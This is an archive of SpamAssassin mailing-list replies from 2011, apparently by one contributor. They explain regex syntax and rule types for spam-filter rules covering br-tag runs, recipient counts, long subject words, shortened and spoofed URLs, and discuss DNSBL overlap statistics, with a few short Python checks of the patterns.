 p3LJZSnX024470
 -bash: br: No such file or directory
 
 The file p3LJZSnX024470 is just a plain text file in a quarantine directory.

Again, you have a CLI escaping issue AND a regex issue.  If you are not
quoting that query, you need to escape almost every single punctuation
character listed there.  Alternatively, you could put that query in quotes.

egrep \[<br>]{5,} p3L... tells the shell that you are looking for the
query [ from input file br and you want to output your results to
(invalid) file ] and then run the command 5, in a subshell, followed
by a third command (your email file).

egrep '[<br>]{5,}' p3L... prevents the shell from trying to interpret
your query but still has a bad query, as it looks for five or more
consecutive occurrences of any character listed between the angle
brackets, so <b><br><br/></b> will match up to the slash.

 What am I missing? I'll turn this into a body rule once I get the
 syntax right then test it for a day or so w/a score of .01. If I'm not
 hitting legitimate mail I'll bump it up.

On top of all of this, egrep does not use Perl-compatible regular
expressions (PCRE) (though the regexps I've used so far are compatible
with Posix regexps as well as PCRE).  See 'man perlre' (or your favorite
website) for help on PCREs.  Try using either grep -P (requires
libpcre3) or pcregrep (which you may have to install) or else perl
itself, like:

  perl -ne 'print if /whatever/' < DomainLiterals.txt

As to what that should be searching for, I suspect you want a multi-line
expression (which none of the above shell commands will help you with
since they parse one line at a time).  Try this:

header  LOCAL_10_10_10_10  X-Spam-Relays-Untrusted
   =~ /^[^\[]+ ip=(?:10\.){3}/

rawbody LOCAL_5X_BR_TAGS   /(?:<br\/?>[\s\r\n]{0,4}){5}/mi

That second one will also match <br/> and allows for a few spaces, tabs,
or linebreaks in between the <br> tags.  For a more strict version of
what you're looking for, try this:

rawbody LOCAL_5X_BR_TAGS   /(?:<br>){5}/i

Note that you need rawbody since body rules will strip HTML.


Again, this rule will hit some hams.  It is also not terribly CPU-efficient.

Better solution:  put some examples up on a pastebin and link them to us
so we can help you find more diagnostic (and simpler) patterns to nail
them with.
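For reference, here's how the loose and strict variants differ on a contrived raw-HTML snippet (Python stand-ins for the rawbody patterns; the snippet is invented):

```python
import re

# Loose vs. strict <br>-run patterns from above; sample body is invented.
loose  = re.compile(r"(?:<br\/?>[\s\r\n]{0,4}){5}", re.I)
strict = re.compile(r"(?:<br>){5}", re.I)

raw = "Buy now!<br>\n<br>\n<br>\n<br>\n<br>\nLimited offer"
print(bool(loose.search(raw)))   # True: tolerates a newline between tags
print(bool(strict.search(raw)))  # False: newlines break the strict run
```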





Re: Regex help

2011-04-21 Thread Adam Katz
 egrep '[<br>]{5,}' p3L... prevents the shell from trying to interpret
 your query but still has a bad query, as it looks for five or more
 consecutive occurrences of any character listed between the angle
 brackets, so <b><br><br/></b> will match up to the slash.

Between the square brackets ([ and ]), sorry.
Angle brackets (< and >) have no special meaning in PCRE (though
they're word boundaries in vim's very-magic regexps) while square
brackets note character classes as noted in man perlre

(I always chuckle when I see them called that; makes me want to do
something like '[[:paladin:]]*?' ... or in vim, '\v[[:paladin:]]{-}'
which looks for a very magical member of the paladin class in a group
that is not greedy.  Too bad I can't also specify race.  Maybe I can
create a race condition?)





Re: Regex help

2011-04-21 Thread Adam Katz
On 04/21/2011 03:55 PM, Kevin Miller wrote:
 Thanks (also to Martin who replied).  I posted one of the spams here:
 http://pastebin.com/9aBAxR7m
 
 You can see the long series of break codes in it.

Yes I can.  I can also see several other diagnostic bits in it, such as
the domain:  http://www.siteadvisor.com/sites/regionstargpsupdates.com

How about this rule instead:

blacklist_from  *@regionstargpsupdates.com

It's much faster and, given the report of the domain being that of a
spammer, much much safer.

 Sorry for the confusion on the 10.10.10.10 - that isn't part of the
 spam, it was just a handy file for testing since it had a repeating
 string in it.

It was a faulty test since '[10.]{3}' will match '10.10.10.10' but not
in the way that you think; it matches the first three characters and
will therefore also match the string '110.64.323.6'
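The difference is easy to demonstrate in Python, where character-class semantics are the same as in Perl:

```python
import re

# '[10.]{3}' is a character class: any three characters drawn from {'1','0','.'}
assert re.match(r'[10.]{3}', '110.64.323.6')   # '110' matches!
assert re.match(r'[10.]{3}', '10.10.10.10')

# '(?:10\.){3}' repeats the literal sequence '10.' three times
assert re.match(r'(?:10\.){3}', '10.10.10.10')
assert not re.match(r'(?:10\.){3}', '110.64.323.6')
```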

 I did get it to work from the CLI, and wrote the following rule:
 
 body  CBJ_GiveMeABreak  /\[br]{5,}/
 describe  CBJ_GiveMeABreak  Messages with multiple consecutive break characters
 score CBJ_GiveMeABreak  0.01

That will not match your sample.  Please re-read my message.  The regex
is wrong and the rule type (body) is wrong.

 I know it may trigger on some ham which is why I set the initial
 score to 0.01.  Better ideas are most welcome though!






Darxus's LOCAL_8X_TAGS

2011-04-21 Thread Adam Katz
Broken apart from previous thread to prevent confusion.

On 04/21/2011 04:18 PM, dar...@chaosreigns.com wrote:
 On 04/21, Adam Katz wrote:
 rawbody LOCAL_5X_BR_TAGS   /(?:br\/?[\s\r\n]{0,4}){5}/mi

 I wonder if it would be useful to generalize this as:

 rawbody LOCAL_8X_TAGS   /(?:<[^>]*>[\s\r\n]{0,4}){8}/mi

 Just a mess of tags in a row without any content.

I'm not sure about email clients specifically, but it is (or rather,
used to be -- I'm way out of date here) a common WYSIWYG foible to
create empty tags when the user plays with various formatting buttons
(like bold and italics) as they decide how something is presented.
Therefore, it is not uncommon to have strings like this:

<b></b><b>1.</b> <b><i>Example bullet</i></b><b>
</b>

I kept thinking that there was a good psychology study in there
somewhere since good knowledge with the inner workings of a specific
WYSIWYG editor would reveal lots of information about how the document
was composed (order, revisions, etc).

HTML generators' sloppiness is so abundant that many of them actually
run their final code through a cleanser application (e.g. Wikipedia uses
HTML Tidy).





Re: Mailspike Performance

2011-04-14 Thread Adam Katz
On 04/12/2011 01:39 AM, Warren Togami Jr. wrote:
 We haven't had working statistics viewing for a few weeks, but now it
 is fixed and I'm amazed by the performance of RCVD_IN_MSPIKE_BL.
 
 http://ruleqa.spamassassin.org/20110409-r1090548-n/T_RCVD_IN_MSPIKE_BL/detail
 
 
 RCVD_IN_MSPIKE_BL has nearly the highest spam detection ratio of all
 the DNSBL's, second only to RCVD_IN_XBL. But our measurements also
 indicate it is detecting this huge amount of spam with a very good
 ham safety rating.
 
 * 84% overlap with RCVD_IN_XBL - redundancy isn't a huge problem
 here because XBL is a tiny score.  But 84% is surprisingly low
 overlap ratio for such high spam detecting rule.  This confirms that
 Mailspike is doing an excellent job of building their IP reputation
 database in a truly independent fashion.
 * 67% overlap with RCVD_IN_PBL - overlap with PBL is concerning
 because PBL is a high score.  But 67% isn't too bad compared to other
 production DNSBL's.
 * 58% overlap with RCVD_IN_PSBL - pretty good

I created a meta for testing new DNSBLs a short while ago and didn't say
anything about it:

meta PUBLISHED_DNSBLS   RCVD_IN_XBL || RCVD_IN_PBL || RCVD_IN_PSBL ||
RCVD_IN_SORBS_DUL || RCVD_IN_SORBS_WEB || RCVD_IN_BL_SPAMCOP_NET ||
RCVD_IN_RP_RNBL
tflags   PUBLISHED_DNSBLS   net nopublish   # 20110127

meta PUBLISHED_DNSBLS_BRBL  PUBLISHED_DNSBLS || RCVD_IN_BRBL_LASTEXT
tflags   PUBLISHED_DNSBLS_BRBL  net nopublish   # 20110127

RCVD_IN_MSPIKE_BL has 99% overlap with the SA3.3 set and 98% with the
SA3.2 set.  That leaves 0.6758% of spam uniquely hitting this DNSBL (1%
of its 67.5822%).  RCVD_IN_SEMBLACK has the same story, resulting in
0.5138% unique spam from its 1% non-overlap (though note its lower s/o).

I'm guessing we have enough lists that they're all around this ballpark,
though we can't prove that without adding seven more meta rules (or
merely grepping the spam.log files).
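For the grepping route, the overlap figure reduces to simple set arithmetic once each message's rule hits are extracted; a minimal sketch (the extraction step from the spam.log format is assumed, and the sample data is made up):

```python
def overlap(hit_sets, rule_a, rule_b):
    """Fraction of messages hitting rule_a that also hit rule_b."""
    a_hits = [s for s in hit_sets if rule_a in s]
    if not a_hits:
        return 0.0
    return sum(rule_b in s for s in a_hits) / len(a_hits)

# One set of rule hits per message (made-up sample data)
msgs = [{'RCVD_IN_XBL', 'RCVD_IN_MSPIKE_BL'},
        {'RCVD_IN_MSPIKE_BL'},
        {'RCVD_IN_XBL'}]

print(overlap(msgs, 'RCVD_IN_MSPIKE_BL', 'RCVD_IN_XBL'))  # 0.5
```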





Re: SpamCop and false positives from Yahoo

2011-04-08 Thread Adam Katz
 I'm seeing a lot of false positives from SpamCop blacklisting Yahoo
 mail IP's.

 For example:
 http://www.senderbase.org/senderbase_queries/detailip?search_string=98.138.82.0%2F24
 http://www.senderbase.org/senderbase_queries/detailip?search_string=115.178.12.0%2F24

 Anyone tried or anyone have a contact at SpamCop who can get Yahoo
 mail blocks whitelisted?

On 04/07/2011 11:33 PM, Mark Chaney wrote:
 White listing yahoo is a horrible idea. As usual, you should just
 use spamcop for scoring, not outright blocking email. Spamcop has had
 a poor reputation for false positives for a quite awhile now.

Yahoo sometimes selects specific IP ranges for sending mail with
spammy-looking qualities so as to keep their less spammy users on
cleaner relays.  This is mostly damage control and is by no means
reliable.  It certainly can't have trust extended to third-party indices
like CBL, SpamCop, or DNSWL, though (as you can see) it does leave a mark.

Note, I am not speaking for my employer, etc etc.  (Please assume this
unless I say otherwise.)





Re: Create a rule to block MAX recipients

2011-04-06 Thread Adam Katz
On 04/06/2011 01:00 PM, John Hardin wrote:
 Dang, I thought these were already in my sandbox:
 
 describe TO_TOO_MANY To: too many recipients
 header   TO_TOO_MANY To =~ /(?:,[^,]{1,80}){30}/
 
 describe TO_WAY_TOO_MANY To: too many recipients
 header   TO_WAY_TOO_MANY ToCc =~ /(?:,[^,]{1,80}){50}/
 
 describe CC_TOO_MANY Cc: too many recipients
 header   CC_TOO_MANY Cc =~ /(?:,[^,]{1,80}){30}/

It's been in mine for ages:

header   KHOP_BIG_TO_CC  ToCc =~ /(?:[^,\@]{1,60}\@[^,]{4,25},){10}/
describe KHOP_BIG_TO_CC  Sent to 10+ recipients instead of Bcc or a list
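Both rule families count recipients by counting commas in the header; Python's re engine treats these patterns the same way Perl does, which makes them easy to exercise (the sample addresses are made up):

```python
import re

# 30 commas, each followed by 1-80 non-comma characters => 31+ recipients
too_many = re.compile(r'(?:,[^,]{1,80}){30}')

many = ', '.join('user%d@example.com' % i for i in range(31))  # 30 commas
few  = ', '.join('user%d@example.com' % i for i in range(30))  # 29 commas

assert too_many.search(many)
assert not too_many.search(few)
```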

I'm pretty sure I've had several other iterations of it as well, but
they've all been wiped because they perform miserably.  This is a good
mark of a nontechnical user rather than spam.  Most of its hits are ham.

http://ruleqa.spamassassin.org/20110319/%2FKHOP_BIG_TO_CC

  MSECS    SPAM%     HAM%    S/O    RANK   SCORE  NAME
      0   0.5786   0.6643  0.466    0.42    0.01  T_KHOP_BIG_TO_CC

Looking at the score map, most of the spam this rule hits is already
easily marked as such.

My recollection of earlier incarnations of these rules is that they were
reliably under the 0.400 S/O mark.

This is best implemented at the MTA.  Reject too many recipients and
make sure that the sender knows what was wrong.





Re: ups.com virus has now switched to dhl.com

2011-03-31 Thread Adam Katz
On 03/31/2011 08:59 AM, Michael Scheidell wrote:
 all those nice ups.com rules, tests and signatures?
 
 the EXACT same file that was in a ups.com virus? is now being sent 
 'from' dhl.com (come on ups/dhl.. I know SPF is broken, but in this
 case it would sure help us decide if the sending ip is authorized to
 send on your behalf)

What rules?  Running `grep -Pri '\b\w?ups' rules*` ('\w?' allows for
matching '\bups') hits only one related rule, DOS_FAKE_UPS_TRACK_NUM,
which is still in testing (and keys on the word 'UPS' in the subject,
not the domain).

I'm recalling DHL scams being more prevalent than UPS for a long long
time, but ymmv.

 with some pretty weird received lines:  is this 'ipv8'? 
 
 received:from smtp1.txfxczpw.net ([11169.98.12888.1258]) by
 relay.cxjrc.com with SMTP; Thu, 31 Mar 2011 09:09:04 -0600
 message-id:2e9701cbef83$48a30ab0$6500a8c0@MERIDA

Hah, somebody forgot an upper bound on their random number generator!
I've never seen a fake IP octet greater than the three hundreds (TV
shows sometimes use those like 555- phone numbers).





Re: Spam

2011-03-30 Thread Adam Katz
On 03/29/2011 04:57 PM, Martin Gregorie wrote:
 On Wed, 2011-03-30 at 00:58 +0200, mar...@swetech.se wrote:
 recetly i been getting ALOT of these mail with the subjects like this
 contain a link to some scam/chinese crap factory

 i run the latest spamassassin along with amavis  but these mails keep 
 getting through any ideas?

 Re: YouWillNotBelieveYourPennisCanBbeThhatHardAndThick!GiveYouserlfATreat
 
 Since the longest (English) word I know has 28 letters
 (antidisestablishmentarianism), a private rule like:
 
 header VERY_LONG_WORD  Subject =~ /Re:\s+\S{29}/
 
 should catch that spam.

The multi-lingual dictionary that I use for this kind of purpose has 132
words that are 29+ characters.  Its longest word is 58 characters:
Llanfairpwllgwyngyllgogerychwyrndrobwllllantysiliogogogoch is a large
village on the Welsh island of Anglesey, see
http://en.wikipedia.org/wiki/Llanfairpwllgwyngyll for more.  Wikipedia
also notes a hill in New Zealand (short name Taumata) with an even
longer name.  The next longest word is
pneumonoultramicroscopicsilicovolcanoconiosis with 45 letters.  German
words, which I would have expected to take the cake, seem to be limited
to 35 or so letters.

Maybe try this instead:

header VERY_LONG_WORD  Subject =~ /Re:\s+\w(?![a-z]{40})[A-Za-z]{40}/
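This pattern behaves identically under Python's re, which makes the lookahead easy to verify: it skips long all-lowercase words (such as the place names above) while still catching CamelCase run-ons:

```python
import re

long_word = re.compile(r'Re:\s+\w(?![a-z]{40})[A-Za-z]{40}')

# The reported spam subject: 50 letters with case transitions -- caught
assert long_word.search('Re: YouWillNotBelieveYourPennisCanBbeThhatHardAndThick')

# 58-letter Welsh place name, lowercase after the initial capital -- skipped
assert not long_word.search(
    'Re: Llanfairpwllgwyngyllgogerychwyrndrobwllllantysiliogogogoch')
```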


If anybody is interested in the dictionary I use, this should be enough
to replicate it:

$ ls -lGg |sed 's/^.* 1 //; s/ ... .. . / /'
total 18M
 17M all
  32 american-english -> /usr/share/dict/american-english
  37 american-english-huge -> /usr/share/dict/american-english-huge
  39 american-english-insane -> /usr/share/dict/american-english-insane
 86K beale.wordlist.asc
  25 brazilian -> /usr/share/dict/brazilian
  36 british-english-huge -> /usr/share/dict/british-english-huge
  37 canadian-english-huge -> /usr/share/dict/canadian-english-huge
 86K diceware.wordlist.asc
1.6K expurgated
  22 french -> /usr/share/dict/french
  23 italian -> /usr/share/dict/italian
 135 make-all
  23 ngerman -> /usr/share/dict/ngerman
  23 ogerman -> /usr/share/dict/ogerman
  23 spanish -> /usr/share/dict/spanish
1.7M twl06.txt
  21 words -> /usr/share/dict/words
$ cat make-all
#!/bin/sh

( cat `ls |grep -Ev '^all|.wordlist.asc'`
  sed -r '/^[0-9]{5}\s+/!d; s///; /\w/!d' *.wordlist.asc
) |sort -f |uniq -i > all


Expurgated and twl06.txt are scrabble dictionaries that you'll have to
find specifically.  The .wordlist.asc files are for diceware.
Everything else came from a Debian package.  If you're not a word nut
like me, all you really need is the largest of each of the languages,
plus perhaps the standard English dictionary so you can determine if
something is an edge case.

This made it really easy for me to verify the cialis-in-word problem we
had here earlier; `grep -ci cialis all` currently counts 287 words.





Re: Spam

2011-03-30 Thread Adam Katz
On 03/30/2011 01:23 PM, RW wrote:
 A lot of these long words are rarely used in the wild - other than
 to say how long they are.
 
 The subjects have two separate characteristics: the length and the 
 number of lower to upper case transitions. I score them separately
 and use:
 
 header SUBJ_LONG_WORD Subject =~ /\b[^[:space:][:punct:]]{30}/
 header SUBJ_ODD_CASE  Subject =~ /(?:[[:lower:]][[:upper:]].{0,15}){3}/

(Personally, I'd prefer to limit it to letters rather than also
including numbers, underscores, and special characters.)
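Translated to Python's re (which lacks POSIX classes, so [[:lower:]][[:upper:]] becomes [a-z][A-Z]), the case-transition test looks like this:

```python
import re

# Three lower-to-upper case transitions, each within 15 characters of the last
odd_case = re.compile(r'(?:[a-z][A-Z].{0,15}){3}')

assert odd_case.search('YouWillNotBelieveYourPennisCanBbeThhatHard')
assert not odd_case.search('Normal subject line')
```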

There's also exaggerated text like "rg",
"hahahahahahahahahahahahahahaha", "loll!1one",
intentional strings like "goodluckwiththat", and suffixes like
"somethingorother" (as in Mr. Rosensomethingorother).

I think my rule was a little more efficient at accomplishing something
similar.  John's was better named and is preferable except for the fact
that it still takes a while to parse (though at least it's limited to
just one line of each message).





Re: Obfuscating advanced fee scams with html attachements?

2011-03-29 Thread Adam Katz
On 03/28/2011 10:41 PM, Ned Slider wrote:
 NSL_RCVD_FROM_USER=1.226,
 
 Personally I score this rule way up and would have no hesitation
 with outright blocking at smtp level - it's as good an indication of
 spam as I've ever seen. Scoring at 6pts here and never seen a FP.

This is a good illustration of our corpus not being strong enough; the
current stats make that rule look useless since its lowest-scoring match
is seven points and it hits 0.0278% of all spam < 10 points.
Furthermore, it has 99% overlap with FORGED_MUA_OUTLOOK, which hits far
more spam while maintaining a very low ham hit rate.

http://ruleqa.spamassassin.org/20110321/NSL_RCVD_FROM_USER/detail





Re: fake URL's in mail

2011-03-28 Thread Adam Katz
On 03/25/2011 04:59 AM, Matus UHLAR - fantomas wrote:
 Are there REALLY that MANY massmailers that can not post
 valid URL's? Something is rotten in the state of Denmark...

Yes.  Here is an example of ham in this category (obfuscated from an
opt-in newsletter I received a few days ago):

 .. you can do so on my website at: www.example.org
 [http://r20.rs6.net/tn.jsp?llr=t3gsdecfbet=1204949082340s=635e=001QT_SegTbXU1N7K_IcTndRqXABrEhqSbxbIYhGmFwcCswh8kkaQwhQAma4PuTWPg1awoSp0UNBpvRfUEVliJItwZU4La1KsxUcV_nET7t-EcK0AEUgxApBBjsSLSUbjQZ4HxS17k1-0U=]
 or in the mail at ...

This is not uncommon.  I've seen it in surveys sent as follow-ups to
orders, in newsletters, in ha ha you didn't opt out ads from companies
I previously had business with, and I'm sure a few other examples.
Shortened URLs are also used for this.

(I've never understood why they don't use a hash table for those
tracking URLs so that they don't get truncated...)

 On 23/03/2011 4:36 PM, Adam Katz wrote:
 Even with such a mechanism in place, it unduly penalizes the 
 little guys.

On 03/25/2011 05:00 AM, Matus UHLAR - fantomas wrote:
 even little guys should be able to send correct URLs

Those are correct URLs.  They merely track subscriber clicks in order to
get statistics and report them back to their customer (the newsletter
organizer or sales company).

 On 23.03.11 16:42, Lawrence @ Rogers wrote:
 Agreed. It's just one of those impractical things and just ain't 
 worth the effort.
 
 you have never received phishing attack of your domain, did you?

If you intend this to target phishing, I would propose going the other
direction with it -- instead of needing to whitelist the hundreds to
thousands of sites that might do link tracking or another form of
redirection, go the other way and mark popular phishing targets for this
scan.

Another option is to use a shortened URL detector and a bulk mail
detector (like __NOT_A_PERSON) to cleanse the results, though I still
think it would be clunky and FP-ridden.





Re: fake URL's in mail

2011-03-23 Thread Adam Katz
On 03/23/2011 11:43 AM, Matus UHLAR - fantomas wrote:
 On 03/21/2011 09:37 AM, Matus UHLAR - fantomas wrote:
 Does anyone successfully use plugin or at least rules that
 catch fake URLs?

 On 21.03.11 13:36, Adam Katz wrote:
 __SPOOFED_URL, a rule already shipping with SA, does this.

 I know about the problem with legal mail and spoofed URL's. That's
 why I asked about plugin that would be able to accept whitelists.

That would require an ENORMOUS whitelist and very close attention to its
upkeep.  I do not see this as practical without using a URIBL-style
mechanism (which would also require high maintenance).  Even with such a
mechanism in place, it unduly penalizes the little guys.





Re: username in from address

2011-03-23 Thread Adam Katz
On 3/22/2011 1:16 PM, Mark Chaney wrote:
 Ever notice that a lot of spam seems to have your username in
 their from address? Such as an email sent TO b...@domain.com is
 FROM blah...@anotherdomain.com (notice 'blah' included in the
 from address).

On 3/22/2011 2:31 PM, Adam Katz wrote:
 somebody could throw something up in their sandbox, but we'd need
 the result from timing.log (not published) to properly gauge the
 results (assuming it even has a favorable hit rate and S/O).

Watch __TO_EQ_FROM_USR and __TO_EQ_FROM_USR_NN on ruleqa starting
tomorrow.  The latter rule ignores trailing numbers, e.g. From:
joh...@example.com matches To: j...@other.example.org as well as To:
john6143598435623...@unrealistic.example.net.
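The sandbox rule bodies aren't shown here, but the described comparison can be sketched as a plain function (a hypothetical helper, not the actual SA rule implementation; the addresses are made up):

```python
import re

def to_eq_from_usr_nn(from_addr, to_addr):
    """Sketch of the described __TO_EQ_FROM_USR_NN behavior: the
    localparts match once trailing digits are stripped."""
    strip = lambda addr: re.sub(r'\d+$', '', addr.split('@')[0].lower())
    return strip(from_addr) == strip(to_addr)

assert to_eq_from_usr_nn('johnny7@example.com', 'johnny@other.example.org')
assert to_eq_from_usr_nn('john@example.com', 'john1234@unrealistic.example.net')
assert not to_eq_from_usr_nn('mary@example.com', 'john@other.example.org')
```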

Assuming it performs decently, we'll have to examine its CPU performance
(which I can't do).

 It also doesn't address the abstraction that Mark was trying to
 share with us.  The real question is:  is this common in uncaught
 spam?

On 03/22/2011 07:09 PM, Ted Mittelstaedt wrote:
 Unfortunately it is very common on this mailing list to make the
 claim that "oh, that [insert special case here] isn't a problem
 because our other filters are good enough to catch it" when the
 insert special case is difficult to figure out how to program for.

Eh?  I don't see where you got that from; I see no mention of any
special cases (unless you're talking about overlap, which is a factor we
need to take more seriously).  I just wanted some nods from people with
good intuition on these things before bothering to try it since my
intuition is that it won't help.  No offense (nor elitism) intended.

 But the fact is that we are approaching the area of diminishing
 returns with the Spamassassin canned rulesets.

I used to think that.  Now I work at a company with a massive private
stock of SA rules that handily disproves it.  The biggest problem is
that it takes tons of automated systems plus a nontrivial number of
full-time rule writers to make it hum.

 You shouldn't be asking the question "how much uncaught spam does
 this thing I think is an ugly hack would be good for"
 
 You should be saying "well, it will probably only catch 2% of the 
 uncaught spam - but if I add this ugly hack to that other ugly hack
 to that other ugly hack all of which only catch 2% of the uncaught
 spam - why then guess what now I'm making a real dent in the
 stuff!!!"

So if gluing three ugly hacks together triggers on 2% of < 5 point spam,
it's worthwhile?  I was avoiding specifics because I'm not sure of how
this will play out.  You were probably talking about three separate
hacks that each independently catch 2% of uncaught spam, working on the
assumption that there is minimal overlap.  Overlap is one of the GA's
biggest shortcomings.

My intuition is that this rule will be somewhere between
__TO_EQ_FROM_DOM (S/O 0.466, 10.5% spam, 2.8173% uncaught-spam*) and
__TO_EQ_FROM (S/O 0.879, 10.3% spam, 2.1365% uncaught-spam), probably
closer to _DOM.  Nice guess on the 2% figure!

* Uncaught-spam% was calculated from summing totals given by ruleqa's
score-map data for scores under 5.  Since __HAS_RCVD hits all but one
spam, I used its summed hits < 5 as the divisor.

 The former attitude is "your problem is an annoyance to me and I'll 
 try to avoid it by studying it to death"; the latter is a "how can I
 help you with your problem" attitude.

Again, no offense intended.  Like points (and therefore FPs!),
inefficiencies add up when you have large volumes of rules, so we're
very sensitive about the efficiency of rules that aren't top shelf.  I
see no reason not to apply that same logic here.

As to studying things to death, I think it's a good mantra to tread
lightly (especially when armed with a big stick).

I've been discussing looking at the proposed pattern.  Everybody else
has been offering workarounds.  Both avenues have merit.


SA devs do more than spend our lives on this list.  There is a balance
of how much time we dawdle in uncertain pursuits.  Demanding our
attention and research is not terribly polite, especially when coupled
with insults.





Re: TAB_IN_FROM from g...@vger.kernel.org

2011-03-22 Thread Adam Katz
On 03/22/2011 12:58 PM, Greg Troxel wrote:
 I've been noticing that mail from g...@vger.kernel.org is getting lots
 of points, and this seems like a recent change.  Specifically, these
 rules are hitting on almost all messages:
 
 *  0.1 KB_DATE_CONTAINS_TAB KB_DATE_CONTAINS_TAB
 *  3.8 TAB_IN_FROM From starts with a tab
 
 I see that this has been brought up before:
 
https://issues.apache.org/SpamAssassin/show_bug.cgi?id=6429

Does ALL mail from that list trigger these rules, or just some?  Is the
User-Agent header always Gnus/5.11 (Gnus v5.11) Emacs/22.2 (gnu/linux)
when it triggers?

If you have examples of other User Agents, please post them to the bug.





Re: username in from address

2011-03-22 Thread Adam Katz
 On 3/22/2011 1:16 PM, Mark Chaney wrote:
 Ever notice that a lot of spam seems to have your username in their
 from address? Such as an email sent TO b...@domain.com is FROM 
 blah...@anotherdomain.com (notice 'blah' included in the from
 address). This appears to be the case with a large a majority of
 the spam that gets through my filters. Any ideas how to handle
 this? Would be nice to be able to add a score for matches like
 that.

This hasn't been common enough (in my experience) to justify either of
the two ways to match it (a plugin or else an ugly pair of multi-line
ALL header rules).  I suppose somebody could throw something up in their
sandbox, but we'd need the result from timing.log (not published) to
properly gauge the results (assuming it even has a favorable hit rate
and S/O).

On 03/22/2011 01:59 PM, Ted Mittelstaedt wrote:
 If this sort of thing bothers you then simply use a unique or close
 to unique username and then put a filter in your e-mail client.
 
 send mail from:
 
 markymarkythefunkyd...@northpole.com
 
 and your guaranteed that anyone mailing you with
 markymarkthefunkydude in any part of their sending e-mail address
 is a spammer, and it should be child's play to create a filter in
 even Outlook that will delete those messages.

That's an ugly workaround that will serve to annoy anybody he
corresponds with (especially if he's dictating his address at a party;
that doesn't fit on a napkin).  It also requires trashing an old email
address, which means alienating/losing old contacts.

It also doesn't address the abstraction that Mark was trying to share
with us.  The real question is:  is this common in uncaught spam?





Re: Regex Rule Help?

2011-03-21 Thread Adam Katz
On 03/21/2011 10:07 AM, Terry Carmen wrote:
 I'm trying to match any URL that points to a URL shortener.
 
 They typically consist of http(s) followed by a domain name,
 a slash and a small series of alphanumeric characters,
 *without a trailing / or file extension*.
 
 I seem to be having pretty good luck matching the URL, however I
 can't figure out how to make the regex explicity *not* match
 anything that ends in a slash or contains an extension.
 
 For example, I want to match "http://asdf.ghi/j2kj4l23", but not 
 "http://asdf.ghi/j2kj4l23/abc.html" or "http://asdf.ghi/j2kj4l23/"

In this specific case, I think you want a simple end-of-line indicator,

uri  ASDF_GHI_SHORT  m'^http://asdf\.ghi/[\w-]{1,12}$'i

In order to match  http://asdf.ghi/j2kj4l23#mno  you might want:

uri  ASDF_GHI_SHORT  m'^http://asdf\.ghi/[\w-]{1,12}(?:[^/.\w-]|$)'i

( I used m'' instead of // so I didn't have to escape the slashes.  Any
punctuation can be used in that manner, though the leading m is only
optional in m// ).

 I tried using the perl negative look-ahead as both : (?!/) and
 (?!\/) without success.

As to using a negative look-ahead operator:  Though I'm not exactly sure
about when it's needed, you sometimes have to put something after it,
like  /foo(?!bar)(?:.|$)/  ... this is not mentioned in the spec.
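The anchored version is easy to exercise in Python, which treats this pattern the same way (asdf.ghi is the thread's placeholder domain):

```python
import re

# Shortener path: 1-12 word chars or dashes, then end of string
short = re.compile(r'^http://asdf\.ghi/[\w-]{1,12}$', re.I)

assert short.match('http://asdf.ghi/j2kj4l23')             # bare shortener path
assert not short.match('http://asdf.ghi/j2kj4l23/')        # trailing slash
assert not short.match('http://asdf.ghi/j2kj4l23/abc.html')
```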





Re: fake URL's in mail

2011-03-21 Thread Adam Katz
On 03/21/2011 09:37 AM, Matus UHLAR - fantomas wrote:
 Does anyone successfully use plugin or at least rules that catch
 fake URLs?

 I mean URLs pointing to different address than they appear, like:
 
 <a href=phishing.site/fake/webmail>http://webmail.example.com/</a>

No plugin needed.  __SPOOFED_URL, a rule already shipping with SA, does
this.  Note that it FPs on a significant amount of marketing ham:

http://ruleqa.spamassassin.org/20110321-r1083702-n/__SPOOFED_URL/detail

  MSECS    SPAM%     HAM%    S/O    RANK   SCORE  NAME
      0   2.8104   5.9645  0.320    0.44   (n/a)  __SPOOFED_URL

rawbody  __SPOOFED_URL  m/<a\s[^>]{0,99}\bhref=(?:3D)?.?(https?:[^'> ]{8,30})[^>]{0,99}>(?:[^<]{0,99}<(?!\/a>)[^<]{1,99})*(?!\1)https?:\/\/[^<]{5}/i





Re: sa-updates

2011-03-10 Thread Adam Katz
On 03/10/2011 07:59 AM, Adam Moffett wrote:
 I'd be happy to contribute, but we bounce or outright delete high
 scoring spam.
 
 After Reading these wiki articles: 
 http://wiki.apache.org/spamassassin/HandClassifiedCorpora 
 http://wiki.apache.org/spamassassin/CorpusCleaning
 I get the impression that they want a representative sample of your 
 spam, and i will skew things in a bad way if I only submit the spam
 that spamassassin already scored low.

What is your bounce/delete threshold?  If it's high enough, I would say
that the skew it presents to the scores would actually stand to help
more than hurt (as long as we still have plenty of other non-trap
sources that contribute un-capped spam).

I figure spam capped at 15+ points would be fine, but you'll need
developer consensus on that.





Re: sa-updates

2011-03-10 Thread Adam Katz
On 03/10/2011 11:49 AM, Jason Bertoch wrote:
 On 2011/03/10 2:17 PM, Adam Katz wrote:
 I figure spam capped at 15+ points would be fine, but you'll need 
 developer consensus on that.
 
 
 Wouldn't spam already scored at 15+ be considered a little redundant
 to the corpus?  If not, I'm certain I could modify my config to keep
 a copy for processing in the mass checks.

You read me in reverse.  Spam capped at 15+ means spam that scores no
more than 15 points (since that was rejected or deleted).  If a minority
of our corpora are limited to lower-scoring spams, the genetic algorithm
would be slightly more biased in favor of the borderline cases and FNs.

As Darxus points out, if the majority of our corpora pruned out such
high-scoring messages, we would risk losing that certainty.





Re: The one year anniversary of the Spamhaus DBL brings a new zone

2011-03-08 Thread Adam Katz
On 03/08/2011 01:46 PM, Yet Another Ninja wrote:
 I'll never grasp why one would use one of those in mail.

Many shortened links allow you to anonymously track click-throughs
(clicks-through?), e.g. adding a plus sign to any bit.ly or j.mp URI
will bring anybody to the stats (and target) of the link.

Marketing emailers love using obfuscated URI redirectors to track users.
 I've always been confused about why the resulting tracking links are so
enormously long.

There are still plenty of email and IM clients out there that fail to
properly wrap enormously long URIs (such as google maps links).  I'm
actually surprised google doesn't use goo.gl or whatever for the Link
button in that interface.

I can't remember the last time I sent somebody a non-shortened link that
was over 150 characters.

 I thought there was consense to educate users *not* to visit links 
 they don't know and now we hear that something which hides potential
 danger is ok to be used?

The conscious effort to educate users about the targets of their links
is for phish rather than things that are introduced as new.





Describing AWL

2011-03-07 Thread Adam Katz
On 03/06/2011 11:33 AM, Karsten Bräckelmann wrote:
 On Sun, 2011-03-06 at 10:51 -0800, JP Kelly wrote:
 I just found an incoming message which is ham but marked as spam.
 It received a score of 14 because it is in the auto white-list.
 Shouldn't it receive a negative score?
 
 http://wiki.apache.org/spamassassin/AwlWrongWay
 
